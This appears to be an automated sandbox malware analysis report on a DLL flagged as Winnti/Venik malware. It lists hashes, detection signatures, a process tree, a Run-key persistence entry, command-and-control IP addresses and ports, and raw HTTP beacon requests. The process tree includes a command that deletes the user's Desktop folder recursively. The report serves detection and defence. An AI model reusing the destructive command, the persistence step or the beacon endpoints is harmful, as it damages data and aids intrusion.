Windows Analysis Report
QCTYoyX422.dll

Overview

General Information

Sample name: QCTYoyX422.dll (renamed because original name is a hash value)
Original sample name: 78131997ac3542a3ce1c2ae4afac1474ba0a19cb.dll
Analysis ID: 1578323
MD5: d32fca080e7b321914810ff69eafd1a4
SHA1: 78131997ac3542a3ce1c2ae4afac1474ba0a19cb
SHA256: 2281a8837520789fed9c41a66d241a8cf85b83085da2b0fe0f8408e49bde8cef
Tags: dll, user-NDA0E

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Creates an autostart registry key pointing to binary in C:\Windows
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
PE file has a writeable .text section
Queries disk data (e.g. SMART data)
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to communicate with device drivers
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries information about the installed CPU (vendor, model number etc)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • loaddll32.exe (PID: 6692 cmdline: loaddll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)
    • conhost.exe (PID: 6048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3576 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • rundll32.exe (PID: 6156 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)
        • cmd.exe (PID: 4416 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • PING.EXE (PID: 2968 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 5400 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 6776 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3852 cmdline: rundll32.exe C:\Users\user\Desktop\QCTYoyX422.dll,PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 5476 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3852 -s 680 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • rundll32.exe (PID: 6360 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
      • cmd.exe (PID: 2360 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • PING.EXE (PID: 5912 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
    • rundll32.exe (PID: 1268 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",InputFile MD5: 889B99C52A60DD49227C5E485A016679)
    • rundll32.exe (PID: 3780 cmdline: rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",PrintFile MD5: 889B99C52A60DD49227C5E485A016679)
      • WerFault.exe (PID: 1568 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • rundll32.exe (PID: 4512 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 612 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 5900 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
  • rundll32.exe (PID: 2164 cmdline: "C:\Windows\SysWOW64\rundll32.exe" "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg MD5: 889B99C52A60DD49227C5E485A016679)
    • cmd.exe (PID: 6640 cmdline: cmd.exe /c ping 127.0.0.1 -n 3&rd /s /q "C:\Users\user\Desktop" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 1888 cmdline: ping 127.0.0.1 -n 3 MD5: B3624DD758CCECF93A1226CEF252CA12)
No configs have been found
Source | Rule | Description | Author | Strings
QCTYoyX422.dll | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth |
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo
Source | Rule | Description | Author | Strings
3.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth |
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo
10.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth |
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo
17.2.rundll32.exe.10000000.0.unpack | Winnti_NlaifSvc | Winnti sample - file NlaifSvc.dll | Florian Roth |
  • 0x3b77e:$x1: cracked by ximo
  • 0x3b838:$x1: cracked by ximo
  • 0x3b8f2:$x1: cracked by ximo
  • 0x3b9ac:$x1: cracked by ximo
  • 0x3ba66:$x1: cracked by ximo
  • 0x3bb20:$x1: cracked by ximo
  • 0x3bbda:$x1: cracked by ximo
  • 0x3bc94:$x1: cracked by ximo
  • 0x402d6:$x1: cracked by ximo
  • 0x43d1b:$x1: cracked by ximo

System Summary

Source: Registry Key set, Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\QCTYoyX422.dll",DoAddToFavDlg, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\rundll32.exe, ProcessId: 5400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dtfd
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-19T15:33:39.327074+0100 | 2812407 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49718 | 107.160.131.253 | 18659 | TCP

AV Detection

Source: QCTYoyX422.dll, Avira: detected
Source: QCTYoyX422.dll, ReversingLabs: Detection: 78%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 99.9% probability
Source: QCTYoyX422.dll, Joe Sandbox ML: detected
Source: QCTYoyX422.dll, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED, DLL
Source: Binary string: \??\c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507225694.0000000002791000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*.* source: rundll32.exe, 00000003.00000003.2507250715.000000000278B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\c:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\*.*\*.* source: rundll32.exe, 00000003.00000003.4481849158.000000000276E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\Documents and Settings\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*.*.* source: rundll32.exe, 00000003.00000003.4508123861.000000000276E000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe, Code function: 3_2_10007F3E FindFirstFileA,FindNextFileA,Sleep,FindClose
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\SysWOW64\rundll32.exe, File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\

Networking

Source: Network traffic, Suricata IDS: 2812407 - Severity 1 - ETPRO MALWARE Win32/Venik HTTP CnC Beacon : 192.168.2.5:49718 -> 107.160.131.253:18659
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 107.163.56.110 18530
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 107.160.131.253 18659
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 107.160.131.254 23588
Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 116.133.8.92 80
Source: global traffic, TCP traffic: 107.163.56.110 ports 18530,0,1,3,5,8
Source: global traffic, TCP traffic: 107.160.131.253 ports 1,5,6,8,9,18659
Source: unknownNetwork traffic detected: HTTP traffic on port 58021 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 58024 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59600 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59752 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62270 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62271 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 65081 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 65116 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51144 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53634 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53692 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55778 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55836 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57965 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 58045 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60319 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60345 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62729 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62825 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49177 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 49188 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51340 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 51418 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52889 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52993 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55567 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 55602 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57794 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 57903 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60254 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 60361 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62635 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62667 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64311 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64313 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50290 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50408 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52832 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52878 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 54804 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 54823 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 56890 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 56893 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59231 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 59313 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 61952 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 62045 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 63790 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 63809 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64715 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 64718 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 50608 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52686 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 52688 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53487 -> 23588
Source: unknownNetwork traffic detected: HTTP traffic on port 53534 -> 23588
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: global traffic TCP traffic: 192.168.2.5:49718 -> 107.160.131.253:18659
Source: global traffic TCP traffic: 192.168.2.5:49719 -> 107.163.56.110:18530
Source: global traffic TCP traffic: 192.168.2.5:49792 -> 107.160.131.254:23588
Source: Joe Sandbox View IP Address: 107.163.56.110
Source: Joe Sandbox View ASN Name: TAKE2US
Source: Joe Sandbox View ASN Name: AS40676US
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49718 -> 107.160.131.253:18659
Source: Network traffic Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49860 -> 116.133.8.92:80
Source: Network traffic Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49792 -> 107.160.131.254:23588
Source: global traffic HTTP traffic detected: GET /u/5762479093 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET //joy.asp?sid=rungnejcntCWrem5Fe5vteX8v2LUicbtudb8mtiWmtaWndm@ HTTP/1.1 User-Agent: Mozilla/4.0 (compatible) Host: 107.160.131.253:18659 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u1129.html HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.163.56.110:18530 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /article.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15 Host: 107.160.131.254:23588 Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /u/5762479093 HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0) Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /u/5762479093 HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0)Host: blog.sina.com.cn
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /article.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; zh-CN; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15Host: 107.160.131.254:23588Cache-Control: no-cache
